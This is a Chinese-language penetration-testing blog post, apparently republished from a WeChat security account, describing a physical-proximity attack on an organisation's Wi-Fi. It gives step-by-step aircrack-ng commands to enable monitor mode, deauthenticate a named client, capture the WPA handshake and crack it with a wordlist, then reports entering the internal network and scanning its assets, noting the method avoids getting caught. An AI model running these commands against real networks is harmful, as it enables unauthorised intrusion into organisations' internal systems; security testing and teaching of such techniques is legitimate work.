一、设备的准备
设备包括:
1.xxxxxx
2.xxxxxx
3.xxxxxxxxxxx
4.xxxxxxxxx
5.xxxxxxxxxxx
详细设备清单以及内容说明请关注公众号,回复"清单"获取。
我们对目标以及目标环境进行考察,选好地址架设设备,然后对其进行密码破解和钓鱼攻击。另外这里地址以及位置的话跟设备有关,我们在之前已经对天线的有效距离以及生效的信号强度做过实验,具体之前的实验数据在清单中获取。
二、WiFi密码破解攻击
WiFi密码破解攻击主要是利用Linux下的aircrack工具。由于我们连接了外置的无线网卡,这里首先要让虚拟机与无线网卡连接。
0x01 安装驱动
如果你购买的无线网卡是免驱的,那么恭喜你不用受到安装无线网卡驱动的折磨,如果不是免驱的,你就要先给它装上无线网卡的驱动了。安装驱动其实就是几条命令,根据你购买的网卡型号进行安装,这里我购买的网卡需要安装rtl88x2BU驱动:
apt update
apt install bc -y
git clone https://github.com/cilynx/rtl88x2BU_WiFi_linux_v5.3.1_27678.20180430_COEX20180427-5959.git
cd rtl88x2BU_WiFi_linux_v5.3.1_27678.20180430_COEX20180427-5959
VER=$(sed -n 's/PACKAGE_VERSION="(.*)"/1/p' dkms.conf)
sudo rsync -rvhP ./ /usr/src/rtl88x2bu-${VER}
sudo apt-get install dkms
sudo dkms add -m rtl88x2bu -v ${VER}
sudo dkms build -m rtl88x2bu -v ${VER}
sudo dkms install -m rtl88x2bu -v ${VER}
sudo modprobe 88x2bu
这里注意从github上下载的时候看一下最新的是多少,下载最新的。安装过程中如果遇到其他问题直接百度都能找到解决办法,唯独遇到头文件报错的问题是解决不了的,即使你自己下载头文件安装进去也不行,这里我最后找到的解决办法就是给kali装上官方源,然后用官方源更新你的kali,更新完之后再装就可以了。
0x02 接入无线网卡
主机USB接口直接插入无线网卡,Kali虚拟机弹窗提示,选择连接到虚拟机,选中Kali,点击确定。
此时可以看到WiFi虽然显示无连接,但是已经可以搜索附近的WiFi了。
打开终端输入ifconfig查看网卡,存在wlan0。也说明网卡已经识别到了。
然后,我们把设备拿起来,对准我们要进行密码破解的WiFi位置,准备进行攻击。
0x03 正文开始
1、开启网卡监听模式,输入命令:
airmon-ng start wlan0
2、查看是否监听成功:
iwconfig
wlan0变成了wlan0mon,监听成功。
3、探测信号接收器接收到的WiFi:
airodump-ng wlan0mon
主要看三个参数:
- BSSID:路由器的MAC地址
- PWR:信号值,绝对值越低,说明信号越强
- CH:当前路由器使用的信道
airodump‐ng ‐‐bssid 90:76:9F:81:C8:9A ‐c 11 ‐w test wlan0mon
参数说明:
–bssid:路由器的MAC地址
-c:路由器使用的信道。(信道一定不要弄错)
-w:抓取的握手包名称,可以选择输出的路径,这里使用默认输出路径为根目录
下面是连接此WiFi的用户信息,BSSID,STATION等都可以看到。
5、抓取握手包
这个终端不要关,我们任选一个用户进行攻击,使其断开与路由器的连接。(原理没有深究,大概是向目标发送大量数据,使设备与路由器断开连接,停止攻击后,设备会自动连接上路由器,此时就可以抓取到握手包。)
aireplay‐ng ‐0 10 ‐a 90:76:9F:81:C8:9A ‐c 42:C7:0A:57:0B:E4 wlan0mon
参数说明:
-0:指定对目标进行攻击的次数
-a:路由器的MAC地址
-c:目标MAC地址
攻击完成后,此时在第一个终端会显示握手包抓取成功,如下图:
然后在根目录会生成有一些握手包文件,其中包含test-01.cap。
6、在终端输入命令,开始进行密码爆破:
aircrack‐ng ‐w /usr/share/wordlists/rockyou.txt test‐01.cap
7、结果检验
0x04 内网探测
成功连接到某部单位的WiFi,直接进内网。用Goby探测一下内网资产。
探测到存活IP若干,开放端口若干,而且有大量的指纹信息,又有的搞了。
总结
从互联网侧渗透进内网没有实质性进展时,不妨来试一试近源渗透,成功的话直接进内网,可以说令企业或者单位防不胜防。就本次来讲,比起到目标单位插U盘来说,这种方式我们渗透人员的人身安全也有保障,毕竟不会被抓包,也比钓鱼成功的概率也要高上许多。
原文始发于微信公众号(星海安全实验室):记一次IOT设备支撑下的近源渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论